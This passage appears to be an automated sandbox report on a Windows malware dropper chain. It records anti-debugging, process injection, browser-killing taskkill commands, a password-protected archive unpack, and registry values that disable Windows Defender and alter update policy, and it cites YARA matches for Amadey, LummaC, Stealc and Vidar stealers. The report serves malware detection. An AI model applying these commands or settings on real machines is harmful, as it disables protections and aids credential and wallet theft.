LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00B1C858
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6652B mov eax, dword ptr fs:[00000030h]0_2_00F6652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6A302 mov eax, dword ptr fs:[00000030h]0_2_00F6A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000CA302 mov eax, dword ptr fs:[00000030h]1_2_000CA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000C652B mov eax, dword ptr fs:[00000030h]1_2_000C652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000CA302 mov eax, dword ptr fs:[00000030h]2_2_000CA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000C652B mov eax, dword ptr fs:[00000030h]2_2_000C652B
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401325 mov eax, dword ptr fs:[00000030h]7_2_00401325
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401325 mov eax, dword ptr fs:[00000030h]7_2_00401325
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401325 mov eax, dword ptr fs:[00000030h]7_2_00401325
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401325 mov eax, dword ptr fs:[00000030h]7_2_00401325
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401325 mov eax, dword ptr fs:[00000030h]7_2_00401325
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401325 mov eax, dword ptr fs:[00000030h]7_2_00401325
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_004012DC test dword ptr fs:[00000030h], 00000068h7_2_004012DC
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_004012ED mov eax, dword ptr fs:[00000030h]7_2_004012ED
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_004012BE mov eax, dword ptr fs:[00000030h]7_2_004012BE
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD48B7 push dword ptr fs:[00000030h]7_2_00AD48B7
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B00D90 mov eax, dword ptr fs:[00000030h]7_2_00B00D90
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0158C mov eax, dword ptr fs:[00000030h]7_2_00B0158C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0158C mov eax, dword ptr fs:[00000030h]7_2_00B0158C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0158C mov eax, dword ptr fs:[00000030h]7_2_00B0158C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0158C mov eax, dword ptr fs:[00000030h]7_2_00B0158C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0158C mov eax, dword ptr fs:[00000030h]7_2_00B0158C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0158C mov eax, dword ptr fs:[00000030h]7_2_00B0158C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B01525 mov eax, dword ptr fs:[00000030h]7_2_00B01525
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0092B mov eax, dword ptr fs:[00000030h]7_2_00B0092B
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B01554 mov eax, dword ptr fs:[00000030h]7_2_00B01554
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B01543 test dword ptr fs:[00000030h], 00000068h7_2_00B01543
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_007FF26C mov eax, dword ptr fs:[00000030h]8_2_007FF26C
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_007FE62C mov eax, dword ptr fs:[00000030h]8_2_007FE62C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401458 HeapAlloc,GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,7_2_00401458
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeMemory protected: page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 7356, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 4304, type: MEMORYSTR
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeMemory written: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe base: 400000 value starts with: 4D5A
                          Searches for specific processes (likely to inject)
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_004152A5
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B15468 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,7_2_00B15468
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1550C CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_00B1550C
                          Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeMessage posted: Message id: QUERYENDSESSION
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe "C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe "C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe "C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe "C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe "C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe "C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeProcess created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: 955e8e90f4.exe, 00000009.00000000.2487057831.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp, 955e8e90f4.exe, 0000001C.00000002.3994740528.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: file.exe, 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                          Source: fa1ce2a324.exe, 0000001D.00000002.2960937681.0000000000D3B000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: PProgram Manager
                          Source: skotes.exeBinary or memory string: 0 Program Manager
                          Source: 09be480dc7.exe, 00000024.00000002.4170350259.00000000009A5000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: 9Program Manager
                          Source: firefox.exe, 00000018.00000002.2765134615.0000000E92BFB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ?ProgmanListenerWi
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,7_2_00B1413E
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014799001\ce63429ed1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014799001\ce63429ed1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\HIimkmnoZwszQjuGwOBWHQxNRnmTkUxVArHZaZhqiXnGgcZZVljGCJVbZDoweYuVtcBXgKLmsWQDd\AuNaMnrEHPFRbQsygH.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00F4CBEA
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00413D91 GetProcessHeap,HeapAlloc,GetUserNameA,7_2_00413D91
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B140BB GetProcessHeap,GetTimeZoneInformation,7_2_00B140BB
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Disable Windows Defender notifications (registry)
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                          Disable Windows Defender real time protection (registry)
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                          Disables Windows Defender Tamper protection
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeRegistry value created: TamperProtection 0
                          Modifies windows update settings
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                          Source: 6f9ea40b81.exe, 00000008.00000003.3538983714.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3538983714.0000000001185000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3533731552.0000000001216000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 1.2.skotes.exe.90000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.90000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Yara detected Credential Flusher
                          Source: Yara matchFile source: Process Memory Space: 955e8e90f4.exe PID: 7972, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 955e8e90f4.exe PID: 3320, type: MEMORYSTR
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: 6f9ea40b81.exe PID: 7924, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Stealc
                          Source: Yara matchFile source: 00000021.00000002.3470503446.0000000000701000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.3347691049.0000000000701000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.3298144707.000000000139E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000003.3026033423.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.3384712740.000000000146B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.2601702185.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000003.2763862507.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.3268782554.0000000000701000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 7356, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 4304, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: 4508a44a11.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 7356, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
